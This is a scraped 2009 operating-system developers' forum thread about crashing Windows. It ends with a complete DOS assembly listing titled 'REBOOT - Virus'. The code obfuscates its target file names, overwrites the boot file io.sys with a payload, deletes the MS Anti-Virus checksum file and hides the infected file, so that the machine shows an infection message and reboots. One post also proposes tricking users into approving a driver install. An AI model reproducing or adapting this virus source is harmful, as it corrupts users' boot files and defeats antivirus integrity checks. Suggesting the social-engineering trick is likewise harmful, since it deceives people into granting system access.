Re: windows 3.1 fun
Posted: Sun Jun 07, 2009 12:03 pm
thats what i was thinking, trash data or dll's stored in memory. maybe even the kernel, i will try that tonight, see what happens and report back to you guys
The Place to Start for Operating System Developers
http://forum.osdev.org./
Actually, 3.1 ran in 16-bit protected mode most of the time. There hasn't been a real mode Windows since 2.0-ish. Just about everyone gets these details wrong, because Windows had a complex evolution. I have tried to set it straight several times on these forums -- do a search and you'll find some interesting stuff.Love4Boobies wrote:IIRC, Windows 3.1 can also be ran in the infamous 16-bit protected mode for 80286+ CPUs, not just in real mode.
GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
kmtdk wrote:well
one of my friends showed me some code, to make your own code in windows xp run in ring 0 !!
so that is might what you need
and then in ring 0, just "CLI" then windows is DOWN
however, i have not tried it ..
KMT dk
or have the user say "yes" to some prompt about accounts.. or wait that's vista... assuming you are running as an administrator, fully possible.. install a driver... you can talk windows users into anything. "There is an updated driver for your monitor that will make it show cute little bunnies. just say yes to the following prompt"... Also, isn't there a way to start applications/drivers at the very core of startup? One guy charged like $800 or somethign for ramdisk software for windows. I asked him why it was so expensive(and yes, he did sell it, and well) and he said because it was loaded as one of the base drivers of windows, meaning the kernel could use it at a very early stage. Because of this however, he had to write his own NTFS code because at that early of a stage, who knows if the "real" NTFS driver is loaded yet or not...or maybe it was BS to shut me up... loldude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
So... ReadProcessMemory and WriteProcessMemory are bug in the OS?dude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Well there is that.. doubt it allows you to write to SYSTEM processes though, and you have to be administrator to go from user A process to user B process... (Really I now fully appreciate how dangerous it is running as "root" in windows, as everyone does just about)Masterkiller wrote:So... ReadProcessMemory and WriteProcessMemory are bug in the OS?dude101 wrote:GhostXoPCorp wrote:combustor: wow even the mouse froze, and the wave file still played, cool.
(offtopic, dont have to respond ot this) i wonder if their is a way to crash csrss.exe on windows xp using assembly?
If you are running code in userspace you can't access the address space of another process unless there is a bug in the OS.
Code: Select all
; REBOOT - Virus written by Bill Hudson
P8086 ;select the processor
MODEL TINY ;always must be TINY model
DATASEG
FName1 DB 'c'-20 ; File to be INFECTED (CODED)
DB ':'-20,'\'-20,'i'-20,'o'-20
DB '.'-20,'s'-20,'y'-20,'s'-20
;FName1 DB 'c:\io.sys' ; File to be INFECTED
EOF DW 2400h
FName2 DB 'c'-20 ; MS Anti-Virus CHECKSUMS file
DB ':'-20,'\'-20,'c'-20,'h'-20
DB 'k'-20,'l'-20,'i'-20,'s'-20
DB 't'-20,'.'-20,'m'-20,'s'-20
;FName2 DB 'c:\chklist.ms' ; MS Anti-Virus CHECKSUMS file
DW 1A00h
UDATASEG
DW 100H DUP (?)
MyStack LABEL WORD
CODESEG
STARTUPCODE
MOV SP,OFFSET MyStack
CALL DoIt
MOV AH,4CH ; AL has DOS Exit Code in it (see end of DOIT)
INT 21H ; Exit to DOS
RET
DoIt PROC NEAR
PUSH AX BX CX DX
MOV BX,OFFSET FName1
MOV CX,9
Decode1:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode1
MOV BX,OFFSET FName2
MOV CX,13
Decode2:
ADD BYTE PTR [BX],20
INC BX
LOOP DeCode2
MOV AX,4301h ; Set ATTRIB
MOV CX,0 ; None
MOV DX,OFFSET FName1 ; IO.SYS
INT 21h
MOV EOF,1A00h ; Change for open file
MOV AX,3D02h ; OPEN for WRITE
INT 21h
MOV BX,AX ; Get HANDLE in BX
MOV AX,4200h ; SEEK byte
XOR CX,CX
MOV DX,0238h
INT 21h
MOV AX,4000h ; Write to file
MOV CX,OFFSET ReBoot - OFFSET EndMsg ; VIRUS length
MOV DX,OFFSET ReBoot ; VIRUS
PUSH DS ; Save data seg
PUSH CS ; Get code seg
POP DS ; In data seg
INT 21h
POP DS ; Restore data seg
MOV AX,3E00h ; Close IO.SYS
INT 21h
MOV AX,4100h ; Delete file
MOV DX,OFFSET Fname2 ; CHKLIST.MS
INT 21h
MOV EOF,2400h ; Change for Attrib
MOV AX,4301h ; Set ATTRIB
MOV CX,7 ; SYSTEM - HIDDEN - READONLY
MOV DX,OFFSET FName1
INT 21h
POP DX CX BX AX
MOV AL,1 ; DOS Exit Code
RET
DoIt ENDP
ReBoot:
MOV AX,0B800h ; Screen seg
MOV ES,AX ; Into ES
MOV BX,609 ; Location of Msg (HARD-CODED)
; ReBoot is at 568 (0238h)
MOV DI,3077 ; Screen Address
MOV AL,17h ; Attribute
MOV CX,44 ; 44 bytes
CLD ; INC DI after STOSW
ReBoot1:
MOV AH,CS:[BX] ; Get a byte from message
ADD AX,1400h ; ADD 20 to DECODE
STOSW ; Write byte to screen
INC BX ; Next byte in Msg
LOOP ReBoot1
MOV AX,40h ; Seg 40 BIOS DATA AREA
MOV ES,AX ; In ES
MOV ES:72h,1200h ; REBOOT FLAG
INT 19H ; REBOOT
EndReBoot:
Msg:
DB 'Y'-20,'o'-20,'u'-20,'r'-20,' '-20
DB 's'-20,'y'-20,'s'-20,'t'-20,'e'-20
DB 'm'-20,' '-20,'h'-20,'a'-20,'s'-20
DB ' '-20,'b'-20,'e'-20,'e'-20,'n'-20
DB ' '-20,'I'-20,'N'-20,'F'-20,'E'-20
DB 'C'-20,'T'-20,'E'-20,'D'-20,' '-20
DB 'b'-20,'y'-20,' '-20,'R'-20,'E'-20
DB 'B'-20,'O'-20,'O'-20,'T'-20,'!'-20
DB '!'-20,'!'-20,' '-20,' '-20
EndMsg:
; MSG: DB 'Your system has been INFECTED by REBOOT!!! '
END